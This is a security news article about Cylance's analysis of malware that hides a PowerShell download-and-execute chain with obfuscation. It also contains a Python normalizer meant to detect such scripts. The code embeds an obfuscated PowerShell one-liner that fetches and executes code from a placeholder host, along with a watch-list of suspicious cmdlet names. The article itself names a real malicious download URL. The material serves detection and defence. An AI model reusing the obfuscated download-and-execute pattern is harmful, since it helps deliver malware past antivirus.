PowerShell Obfuscation Ups the Ante on Antivirus

The development fits a trend that sees threat actors turning to well-known, commodity malware, overcoming its easy detection with ever-better obfuscation methods.

A new malware sample using a rare obfuscation technique has been spotted that uses the features of PowerShell, a tool that comes built into Microsoft Windows. Analysis from Cylance shows that the tactic succeeds in bypassing most antivirus products.

Cylance researchers stumbled across a malware file using a PowerShell obfuscation method while looking into a set of malicious scripts that had low antivirus detection. The file was a ZIP file containing both a PDF document and VBS script, and it was flagged by just three antivirus products.

It takes a page from other common obfuscation techniques, which include using packers to compress a malware program; encryption to hide its unique strings of code; or techniques that mutate malware cosmetics, such as the overall number of bytes in the program. All of these alter the hash and the signature of the malware so that common antivirus tools won’t flag it as a known malicious agent.

“These techniques change the overall structure of a piece of malware without altering its function,” explained researchers at Cylance, in a technical analysis posted Wednesday on the tactic. “Often, this has the overall result of creating layers which act to bury the ultimate payload, like the nested figures in a Russian doll.”

In the PowerShell gambit, the aforementioned VBS script used a rudimentary Base64 encoding to obfuscate the first layer. That VBS script then downloaded and executed a DAT file via PowerShell. The team found that the script used techniques like string-splitting through concatenation and variable assignment, as well as the use of tick marks and random letter capitalizations to split up the words or signatures that antivirus companies commonly rely upon for malicious PowerShell identification.
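A defender-side normalizer for the tricks just described (no-op tick marks, random capitalization, split literals and variable indirection), added here as an illustration and not taken from Cylance's analysis; the watch-list, the sample script and its URL are constructed for the example.

```python
import re

# A backtick before one of these letters is a real escape inside a double-quoted
# string; before any other character it is a no-op, which is what lets obfuscators
# scatter ticks through cmdlet names (Inv`oke-Expr`ession).
_TICK_NOOP = re.compile(r"`(?![0abefnrtuv])")
_LITERAL = re.compile(r"""('[^']*'|"[^"]*")""")               # quoted string literal
_ASSIGN = re.compile(r"""\$(\w+)\s*=\s*(['"])([^'"]*)\2""")    # $var = 'literal'
_METHOD = re.compile(r"""\.\(\s*['"]([^'"]*)['"]\s*\)""")      # .('DownloadString')

# Constructed watch-list for this example, not Cylance's or any vendor's signature set.
SUSPICIOUS = ("invoke-expression", "downloadstring", "downloadfile",
              "frombase64string", "securestring", "net.webclient")

def collapse_concat(text: str) -> str:
    """Join adjacent literals linked by '+' so 'Down'+'load' becomes 'Download'."""
    parts = _LITERAL.split(text)   # even indexes: code, odd indexes: string literals
    out, i = [parts[0]], 1
    while i < len(parts):
        lit = parts[i][1:-1]
        while i + 2 < len(parts) and parts[i + 1].strip() == "+":
            lit += parts[i + 2][1:-1]
            i += 2
        out += [f"'{lit}'", parts[i + 1]]
        i += 2
    return "".join(out)

def resolve_vars(text: str) -> str:
    """Inline simple $var = 'literal' assignments into later uses of $var."""
    for name, _quote, value in _ASSIGN.findall(text):
        text = re.sub(r"\$" + re.escape(name) + r"\b", lambda _m, v=value: f"'{v}'", text)
    return text

def normalize(script: str) -> str:
    """Undo tick insertion, concatenation, variable indirection and random casing."""
    text = collapse_concat(_TICK_NOOP.sub("", script))
    text = collapse_concat(resolve_vars(text))   # second pass: inlined vars may concatenate again
    return _METHOD.sub(r".\1", text).lower()

def find_indicators(script: str, normalize_first: bool = True) -> list[str]:
    """Watch-list terms present in the script, with or without normalization."""
    text = normalize(script) if normalize_first else script.lower()
    return [k for k in SUSPICIOUS if re.search(r"\b" + re.escape(k) + r"\b", text)]

# Constructed sample in the style the article describes; the URL is a placeholder.
SAMPLE = ("$u = 'http://example.invalid/top.dat'; $m = 'Down' + 'load' + 'String'; "
          "iNvOkE-ExPrE`sSiOn (New-Ob`ject Net.WebC`lient).($m)($u)")
```

On the sample, a plain case-insensitive match finds nothing, while the normalized text exposes the download-and-execute chain; the normalizer does not handle doubled quotes inside literals or non-literal assignments.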

“The file 1cr.dat is where things got interesting,” the researchers explained. “It uses a method of string encryption inherent in C# called SecureString…commonly used to encrypt sensitive strings within applications using Microsoft’s built-in DPAPI.”

They added that the script itself downloaded the file “ravigel.com/top.dat” which was a ZIP archive containing a PE file encoded by the ordinal representation of each hex byte separated by a space character, and prefaced with the heading “google\r\n.”

Meanwhile, the actual payload is “a simple espionage tool widely known to the security community.”

“The cat-and-mouse game of detection and response isn’t new,” Kevin Livelli, director of threat intelligence at Cylance, told Threatpost. “Attackers, whether they’re advanced groups or common criminals, are astute observers of target defenses and adapt accordingly. Malware doesn’t have to be especially complicated or even new to be effective. Obfuscation gives attackers a simple and cheap way to get the job done until the industry adapts and attackers move on to the next technique.”

The development fits a trend that sees threat actors turning to commodity malware, overcoming the fact that its well-known fingerprints are easy to detect by implementing ever-better obfuscation methods.

The sheer volume of commodity malware out there ironically works in threat actors’ favor. “When the fingerprint of a piece of malware is known to all and is within the reach of everyone, the threat actor can hide amongst an impossibly large group of suspects. The payload signature is essentially rendered meaningless,” the researchers explained.

They added, “This trend runs counter to a widely-held assumption in the information security space which holds that highly customized malware paired with zero-day exploits are deserving of the most attention.”
